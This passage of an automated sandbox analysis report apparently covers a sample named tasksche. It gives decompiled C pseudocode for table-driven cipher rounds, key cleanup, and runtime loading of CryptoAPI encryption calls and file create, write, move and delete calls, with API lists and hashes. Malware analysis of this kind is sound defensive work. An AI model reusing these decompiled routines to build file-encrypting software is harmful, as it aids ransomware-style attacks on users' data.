                                                                                					_v16 = _t274;
                                                                                					_v8 = _t275 + 8;
                                                                                					_t242 = _a4;
                                                                                					do {
                                                                                						_t243 =  &(_t242[1]);
                                                                                						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
                                                                                						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
                                                                                						_t245 =  &(_t243[2]);
                                                                                						_t273 = _t157;
                                                                                						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
                                                                                						_v8 = _v8 + 4;
                                                                                						_t242 =  &(_t245[1]);
                                                                                						_t157 =  &(_t157[1]);
                                                                                						 *_t273 =  *_t273 ^  *_v8;
                                                                                						_t27 =  &_v16;
                                                                                						 *_t27 = _v16 - 1;
                                                                                					} while ( *_t27 != 0);
                                                                                				}
                                                                                				_t158 = 1;
                                                                                				_v16 = _t158;
                                                                                				if( *(_t275 + 0x410) > _t158) {
                                                                                					_v12 = _t275 + 0x28;
                                                                                					do {
                                                                                						if(_t274 > 0) {
                                                                                							_t34 =  &_v28; // 0x403b51
                                                                                							_t260 =  *_t34;
                                                                                							_v8 = _v12;
                                                                                							_a4 = _t260;
                                                                                							_v36 = _v24 - _t260;
                                                                                							_t240 = _t275 + 0x434;
                                                                                							_v40 = _v32 - _t260;
                                                                                							_v20 = _t274;
                                                                                							do {
                                                                                								asm("cdq");
                                                                                								_v44 = 0;
                                                                                								asm("cdq");
                                                                                								asm("cdq");
                                                                                								_v8 = _v8 + 4;
                                                                                								 *_t240 =  *(0x4093fc + _v44 * 4) ^  *(0x4097fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00408FFC ^  *0x00408BFC ^  *_v8;
                                                                                								_t240 =  &(_t240[1]);
                                                                                								_a4 = _a4 + 1;
                                                                                								_t84 =  &_v20;
                                                                                								 *_t84 = _v20 - 1;
                                                                                							} while ( *_t84 != 0);
                                                                                						}
                                                                                						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
                                                                                						_v12 = _v12 + 0x20;
                                                                                						_t276 = _t276 + 0xc;
                                                                                						_v16 = _v16 + 1;
                                                                                						_t158 = _v16;
                                                                                					} while (_t158 <  *(_t275 + 0x410));
                                                                                				}
                                                                                				_v8 = _v8 & 0x00000000;
                                                                                				if(_t274 > 0) {
                                                                                					_t236 = _a8;
                                                                                					_t219 = _v24;
                                                                                					_a8 = _t275 + 0x454;
                                                                                					_t100 =  &_v28; // 0x403b51
                                                                                					_v44 =  *_t100 - _t219;
                                                                                					_v40 = _v32 - _t219;
                                                                                					do {
                                                                                						_a8 =  &(_a8[4]);
                                                                                						_a4 =  *((intOrPtr*)(_t275 + 8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
                                                                                						 *_t236 =  *0x004089FC ^ _a4 >> 0x00000018;
                                                                                						_t237 =  &(_t236[1]);
                                                                                						asm("cdq");
                                                                                						 *_t237 =  *0x004089FC ^ _a4 >> 0x00000010;
                                                                                						asm("cdq");
                                                                                						_t238 =  &(_t237[1]);
                                                                                						 *_t238 =  *0x004089FC ^ _a4 >> 0x00000008;
                                                                                						_t239 =  &(_t238[1]);
                                                                                						asm("cdq");
                                                                                						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x4089fc) ^ _a4;
                                                                                						 *_t239 = _t158;
                                                                                						_t236 =  &(_t239[1]);
                                                                                						_v8 = _v8 + 1;
                                                                                						_t219 = _t219 + 1;
                                                                                					} while (_v8 < _t274);
                                                                                				}
                                                                                				return _t158;
                                                                                			}

                                                                                0x00403627
                                                                                0x0040363a
                                                                                0x0040363d
                                                                                0x00403660
                                                                                0x00403682
                                                                                0x00403688
                                                                                0x0040368a
                                                                                0x0040368d
                                                                                0x00403690
                                                                                0x00403690
                                                                                0x00403690
                                                                                0x0040361f
                                                                                0x004036a9
                                                                                0x004036ae
                                                                                0x004036b2
                                                                                0x004036b5
                                                                                0x004036b8
                                                                                0x004036bb
                                                                                0x004035f2
                                                                                0x004036c7
                                                                                0x004036cd
                                                                                0x004036d3
                                                                                0x004036d6
                                                                                0x004036df
                                                                                0x004036e2
                                                                                0x004036e7
                                                                                0x004036ef
                                                                                0x004036f2
                                                                                0x00403701
                                                                                0x00403709
                                                                                0x0040371f
                                                                                0x00403726
                                                                                0x00403727
                                                                                0x00403741
                                                                                0x00403745
                                                                                0x0040374a
                                                                                0x00403760
                                                                                0x00403767
                                                                                0x00403768
                                                                                0x0040377d
                                                                                0x00403780
                                                                                0x00403782
                                                                                0x00403783
                                                                                0x00403786
                                                                                0x00403787
                                                                                0x004036f2
                                                                                0x00403794

                                                                                APIs
                                                                                • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403528
                                                                                • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403537
                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B51,?,?), ref: 004036A9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??0exception@@ExceptionThrowmemcpy
                                                                                • String ID: $Q;@
                                                                                • API String ID: 2382887404-262343263
                                                                                • Opcode ID: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
                                                                                • Instruction ID: bc36c6e363c45e845c5013d3ee32ff29fee655b638a1b5d52e43d816bbd12583
                                                                                • Opcode Fuzzy Hash: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
                                                                                • Instruction Fuzzy Hash: A581C3759002499FCB05CF68C9809EEBBF5EF89308F2484AEE595E7352C234BA45CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 54%
                                                                                			E00403797(void* __ecx, signed int _a4, signed char* _a8) {
                                                                                				signed int _v8;
                                                                                				signed int _v12;
                                                                                				signed char _v16;
                                                                                				signed int _v20;
                                                                                				intOrPtr _v24;
                                                                                				signed int _v28;
                                                                                				intOrPtr _v32;
                                                                                				intOrPtr _v36;
                                                                                				intOrPtr _v40;
                                                                                				signed int _v44;
                                                                                				char _v56;
                                                                                				signed int _t150;
                                                                                				signed int _t151;
                                                                                				signed int _t155;
                                                                                				signed int* _t157;
                                                                                				signed char _t158;
                                                                                				intOrPtr _t219;
                                                                                				signed int _t230;
                                                                                				signed char* _t236;
                                                                                				signed char* _t237;
                                                                                				signed char* _t238;
                                                                                				signed char* _t239;
                                                                                				signed int* _t240;
                                                                                				signed char* _t242;
                                                                                				signed char* _t243;
                                                                                				signed char* _t245;
                                                                                				signed int _t260;
                                                                                				signed int* _t273;
                                                                                				signed int _t274;
                                                                                				void* _t275;
                                                                                				void* _t276;
                                                                                
                                                                                				_t275 = __ecx;
                                                                                				if( *((char*)(__ecx + 4)) == 0) {
                                                                                					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
                                                                                					_push(0x40d570);
                                                                                					_push( &_v56);
                                                                                					L0040776E();
                                                                                				}
                                                                                				_t150 =  *(_t275 + 0x3cc);
                                                                                				if(_t150 == 0x10) {
                                                                                					return E004031BC(_t275, _a4, _a8);
                                                                                				}
                                                                                				asm("cdq");
                                                                                				_t230 = 4;
                                                                                				_t151 = _t150 / _t230;
                                                                                				_t274 = _t151;
                                                                                				asm("sbb eax, eax");
                                                                                				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
                                                                                				_v28 =  *((intOrPtr*)(_t155 + 0x40bc28));
                                                                                				_v24 =  *((intOrPtr*)(_t155 + 0x40bc30));
                                                                                				_v32 =  *((intOrPtr*)(_t155 + 0x40bc38));
                                                                                				_t157 = _t275 + 0x454;
                                                                                				if(_t274 > 0) {
                                                                                					_v16 = _t274;
                                                                                					_v8 = _t275 + 0x1e8;
                                                                                					_t242 = _a4;
                                                                                					do {
                                                                                						_t243 =  &(_t242[1]);
                                                                                						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
                                                                                						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
                                                                                						_t245 =  &(_t243[2]);
                                                                                						_t273 = _t157;
                                                                                						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
                                                                                						_v8 = _v8 + 4;
                                                                                						_t242 =  &(_t245[1]);
                                                                                						_t157 =  &(_t157[1]);
                                                                                						 *_t273 =  *_t273 ^  *_v8;
                                                                                						_t27 =  &_v16;
                                                                                						 *_t27 = _v16 - 1;
                                                                                					} while ( *_t27 != 0);
                                                                                				}
                                                                                				_t158 = 1;
                                                                                				_v16 = _t158;
                                                                                				if( *(_t275 + 0x410) > _t158) {
                                                                                					_v12 = _t275 + 0x208;
                                                                                					do {
                                                                                						if(_t274 > 0) {
                                                                                							_t260 = _v28;
                                                                                							_v8 = _v12;
                                                                                							_a4 = _t260;
                                                                                							_v36 = _v24 - _t260;
                                                                                							_t240 = _t275 + 0x434;
                                                                                							_v40 = _v32 - _t260;
                                                                                							_v20 = _t274;
                                                                                							do {
                                                                                								asm("cdq");
                                                                                								_v44 = 0;
                                                                                								asm("cdq");
                                                                                								asm("cdq");
                                                                                								_v8 = _v8 + 4;
                                                                                								 *_t240 =  *(0x40a3fc + _v44 * 4) ^  *(0x40a7fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00409FFC ^  *0x00409BFC ^  *_v8;
                                                                                								_t240 =  &(_t240[1]);
                                                                                								_a4 = _a4 + 1;
                                                                                								_t84 =  &_v20;
                                                                                								 *_t84 = _v20 - 1;
                                                                                							} while ( *_t84 != 0);
                                                                                						}
                                                                                						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
                                                                                						_v12 = _v12 + 0x20;
                                                                                						_t276 = _t276 + 0xc;
                                                                                						_v16 = _v16 + 1;
                                                                                						_t158 = _v16;
                                                                                					} while (_t158 <  *(_t275 + 0x410));
                                                                                				}
                                                                                				_v8 = _v8 & 0x00000000;
                                                                                				if(_t274 > 0) {
                                                                                					_t236 = _a8;
                                                                                					_t219 = _v24;
                                                                                					_a8 = _t275 + 0x454;
                                                                                					_v44 = _v28 - _t219;
                                                                                					_v40 = _v32 - _t219;
                                                                                					do {
                                                                                						_a8 =  &(_a8[4]);
                                                                                						_a4 =  *((intOrPtr*)(_t275 + 0x1e8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
                                                                                						 *_t236 =  *0x00408AFC ^ _a4 >> 0x00000018;
                                                                                						_t237 =  &(_t236[1]);
                                                                                						asm("cdq");
                                                                                						 *_t237 =  *0x00408AFC ^ _a4 >> 0x00000010;
                                                                                						asm("cdq");
                                                                                						_t238 =  &(_t237[1]);
                                                                                						 *_t238 =  *0x00408AFC ^ _a4 >> 0x00000008;
                                                                                						_t239 =  &(_t238[1]);
                                                                                						asm("cdq");
                                                                                						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x408afc) ^ _a4;
                                                                                						 *_t239 = _t158;
                                                                                						_t236 =  &(_t239[1]);
                                                                                						_v8 = _v8 + 1;
                                                                                						_t219 = _t219 + 1;
                                                                                					} while (_v8 < _t274);
                                                                                				}
                                                                                				return _t158;
                                                                                			}

                                                                                APIs
                                                                                • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037B0
                                                                                • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037BF
                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?), ref: 00403937
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??0exception@@ExceptionThrowmemcpy
                                                                                • String ID:
                                                                                • API String ID: 2382887404-3916222277
                                                                                • Opcode ID: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
                                                                                • Instruction ID: 1cfba4d829132d5223a2741c68a06c6b284a50eb41fad236877f379c856cacdf
                                                                                • Opcode Fuzzy Hash: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
                                                                                • Instruction Fuzzy Hash: B991C375A002499FCB05CF69C480AEEBBF5FF89315F2480AEE595E7342C234AA45CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004029CC(void* _a4) {
                                                                                				void* _t17;
                                                                                				intOrPtr _t18;
                                                                                				intOrPtr _t23;
                                                                                				intOrPtr _t25;
                                                                                				signed int _t35;
                                                                                				void* _t37;
                                                                                
                                                                                				_t37 = _a4;
                                                                                				if(_t37 != 0) {
                                                                                					if( *((intOrPtr*)(_t37 + 0x10)) != 0) {
                                                                                						_t25 =  *((intOrPtr*)(_t37 + 4));
                                                                                						 *((intOrPtr*)( *((intOrPtr*)( *_t37 + 0x28)) + _t25))(_t25, 0, 0);
                                                                                					}
                                                                                					if( *(_t37 + 8) == 0) {
                                                                                						L9:
                                                                                						_t18 =  *((intOrPtr*)(_t37 + 4));
                                                                                						if(_t18 != 0) {
                                                                                							 *((intOrPtr*)(_t37 + 0x20))(_t18, 0, 0x8000,  *((intOrPtr*)(_t37 + 0x30)));
                                                                                						}
                                                                                						return HeapFree(GetProcessHeap(), 0, _t37);
                                                                                					} else {
                                                                                						_t35 = 0;
                                                                                						if( *((intOrPtr*)(_t37 + 0xc)) <= 0) {
                                                                                							L8:
                                                                                							free( *(_t37 + 8));
                                                                                							goto L9;
                                                                                						} else {
                                                                                							goto L5;
                                                                                						}
                                                                                						do {
                                                                                							L5:
                                                                                							_t23 =  *((intOrPtr*)( *(_t37 + 8) + _t35 * 4));
                                                                                							if(_t23 != 0) {
                                                                                								 *((intOrPtr*)(_t37 + 0x2c))(_t23,  *((intOrPtr*)(_t37 + 0x30)));
                                                                                							}
                                                                                							_t35 = _t35 + 1;
                                                                                						} while (_t35 <  *((intOrPtr*)(_t37 + 0xc)));
                                                                                						goto L8;
                                                                                					}
                                                                                				}
                                                                                				return _t17;
                                                                                			}


                                                                                APIs
                                                                                • free.MSVCRT(?,00402198,00000000,00000000,0040243C,00000000), ref: 00402A15
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,0040243C,00000000), ref: 00402A36
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 00402A3D
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$FreeProcessfree
                                                                                • String ID:
                                                                                • API String ID: 3428986607-0
                                                                                • Opcode ID: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
                                                                                • Instruction ID: 6307eaad725422957632c7c85bafc458d1caddc7471a2505469f2591130cc2ff
                                                                                • Opcode Fuzzy Hash: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
                                                                                • Instruction Fuzzy Hash: C4010C72600A019FCB309FA5DE88967B7E9FF48321354483EF196A2591CB75F841CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 16%
                                                                                			E004018B9(void* __ecx) {
                                                                                				signed int _t10;
                                                                                				signed int _t11;
                                                                                				long* _t12;
                                                                                				void* _t13;
                                                                                				void* _t18;
                                                                                
                                                                                				_t18 = __ecx;
                                                                                				_t10 =  *(__ecx + 8);
                                                                                				if(_t10 != 0) {
                                                                                					 *0x40f89c(_t10);
                                                                                					 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
                                                                                				}
                                                                                				_t11 =  *(_t18 + 0xc);
                                                                                				if(_t11 != 0) {
                                                                                					 *0x40f89c(_t11);
                                                                                					 *(_t18 + 0xc) =  *(_t18 + 0xc) & 0x00000000;
                                                                                				}
                                                                                				_t12 =  *(_t18 + 4);
                                                                                				if(_t12 != 0) {
                                                                                					CryptReleaseContext(_t12, 0);
                                                                                					 *(_t18 + 4) =  *(_t18 + 4) & 0x00000000;
                                                                                				}
                                                                                				_t13 = 1;
                                                                                				return _t13;
                                                                                			}


                                                                                APIs
                                                                                • CryptReleaseContext.ADVAPI32(?,00000000,?,004013DB,?,?,?,0040139D,?,?,00401366), ref: 004018EA
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ContextCryptRelease
                                                                                • String ID:
                                                                                • API String ID: 829835001-0
                                                                                • Opcode ID: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
                                                                                • Instruction ID: 2349b07d823645f04250185dd133334db1216db109592f97c32ed3e6f6040a2b
                                                                                • Opcode Fuzzy Hash: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
                                                                                • Instruction Fuzzy Hash: C7E0ED323147019BEB30AB65ED49B5373E8AF00762F04C83DB05AE6990CBB9E8448A58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040170A() {
                                                                                				void* _t3;
                                                                                				_Unknown_base(*)()* _t11;
                                                                                				struct HINSTANCE__* _t13;
                                                                                				intOrPtr _t18;
                                                                                				intOrPtr _t20;
                                                                                				intOrPtr _t21;
                                                                                				intOrPtr _t22;
                                                                                				intOrPtr _t23;
                                                                                				intOrPtr _t24;
                                                                                				intOrPtr _t25;
                                                                                
                                                                                				if(E00401A45() == 0) {
                                                                                					L11:
                                                                                					return 0;
                                                                                				}
                                                                                				_t18 =  *0x40f878; // 0x0
                                                                                				if(_t18 != 0) {
                                                                                					L10:
                                                                                					_t3 = 1;
                                                                                					return _t3;
                                                                                				}
                                                                                				_t13 = LoadLibraryA("kernel32.dll");
                                                                                				if(_t13 == 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				 *0x40f878 = GetProcAddress(_t13, "CreateFileW");
                                                                                				 *0x40f87c = GetProcAddress(_t13, "WriteFile");
                                                                                				 *0x40f880 = GetProcAddress(_t13, "ReadFile");
                                                                                				 *0x40f884 = GetProcAddress(_t13, "MoveFileW");
                                                                                				 *0x40f888 = GetProcAddress(_t13, "MoveFileExW");
                                                                                				 *0x40f88c = GetProcAddress(_t13, "DeleteFileW");
                                                                                				_t11 = GetProcAddress(_t13, "CloseHandle");
                                                                                				_t20 =  *0x40f878; // 0x0
                                                                                				 *0x40f890 = _t11;
                                                                                				if(_t20 == 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t21 =  *0x40f87c; // 0x0
                                                                                				if(_t21 == 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t22 =  *0x40f880; // 0x0
                                                                                				if(_t22 == 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t23 =  *0x40f884; // 0x0
                                                                                				if(_t23 == 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t24 =  *0x40f888; // 0x0
                                                                                				if(_t24 == 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t25 =  *0x40f88c; // 0x0
                                                                                				if(_t25 == 0 || _t11 == 0) {
                                                                                					goto L11;
                                                                                				} else {
                                                                                					goto L10;
                                                                                				}
                                                                                			}


                                                                                APIs
                                                                                  • Part of subcall function 00401A45: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040172C
                                                                                • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00401749
                                                                                • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00401756
                                                                                • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00401763
                                                                                • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00401770
                                                                                • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 0040177D
                                                                                • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040178A
                                                                                • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00401797
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                                                                                • API String ID: 2238633743-1294736154
                                                                                • Opcode ID: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
                                                                                • Instruction ID: c344c10c919c95db3ecd10b94979b50738023765c799e55a58251b06a1d00095
                                                                                • Opcode Fuzzy Hash: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
                                                                                • Instruction Fuzzy Hash: D9118E729003059ACB30BF73AE84A577AF8A644751B64483FE501B3EF0D77894499E1E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			// Runtime resolver for the CryptoAPI exports the sample uses: loads advapi32.dll and
                                                                                			// caches six export addresses in globals at 0x40f894..0x40f8a8. Returns 1 once all are
                                                                                			// present (or were already cached), 0 if the DLL or any export fails to resolve.
                                                                                			E00401A45() {
                                                                                				void* _t1;
                                                                                				_Unknown_base(*)()* _t9;
                                                                                				struct HINSTANCE__* _t11;
                                                                                				intOrPtr _t15;
                                                                                				intOrPtr _t17;
                                                                                				intOrPtr _t18;
                                                                                				intOrPtr _t19;
                                                                                				intOrPtr _t20;
                                                                                				intOrPtr _t21;
                                                                                
                                                                                				_t15 =  *0x40f894; // 0x0
                                                                                				if(_t15 != 0) {
                                                                                					L8:
                                                                                					_t1 = 1;
                                                                                					return _t1;
                                                                                				}
                                                                                				_t11 = LoadLibraryA("advapi32.dll");
                                                                                				if(_t11 == 0) {
                                                                                					L9:
                                                                                					return 0;
                                                                                				}
                                                                                				 *0x40f894 = GetProcAddress(_t11, "CryptAcquireContextA");
                                                                                				 *0x40f898 = GetProcAddress(_t11, "CryptImportKey");
                                                                                				 *0x40f89c = GetProcAddress(_t11, "CryptDestroyKey");
                                                                                				 *0x40f8a0 = GetProcAddress(_t11, "CryptEncrypt");
                                                                                				 *0x40f8a4 = GetProcAddress(_t11, "CryptDecrypt");
                                                                                				_t9 = GetProcAddress(_t11, "CryptGenKey");
                                                                                				_t17 =  *0x40f894; // 0x0
                                                                                				 *0x40f8a8 = _t9;
                                                                                				if(_t17 == 0) {
                                                                                					goto L9;
                                                                                				}
                                                                                				_t18 =  *0x40f898; // 0x0
                                                                                				if(_t18 == 0) {
                                                                                					goto L9;
                                                                                				}
                                                                                				_t19 =  *0x40f89c; // 0x0
                                                                                				if(_t19 == 0) {
                                                                                					goto L9;
                                                                                				}
                                                                                				_t20 =  *0x40f8a0; // 0x0
                                                                                				if(_t20 == 0) {
                                                                                					goto L9;
                                                                                				}
                                                                                				_t21 =  *0x40f8a4; // 0x0
                                                                                				if(_t21 == 0 || _t9 == 0) {
                                                                                					goto L9;
                                                                                				} else {
                                                                                					goto L8;
                                                                                				}
                                                                                			}












                                                                                Instruction addresses for E00401A45 above: 0x00401a48 to 0x00401af1 (per-line address column omitted)

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
                                                                                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
                                                                                • GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
                                                                                • GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
                                                                                • GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
                                                                                • GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
                                                                                • GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                                                                                • API String ID: 2238633743-2459060434
                                                                                • Opcode ID: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
                                                                                • Instruction ID: 9aae3444cc52ced5e7e1ad1d2a06d11cf911cb2b3a933a05a08c6ba10b936042
                                                                                • Opcode Fuzzy Hash: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
                                                                                • Instruction Fuzzy Hash: 20011E32A86311EBDB30AFA5AE856677AE4EA41750368843FB104B2DB1D7F81448DE5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
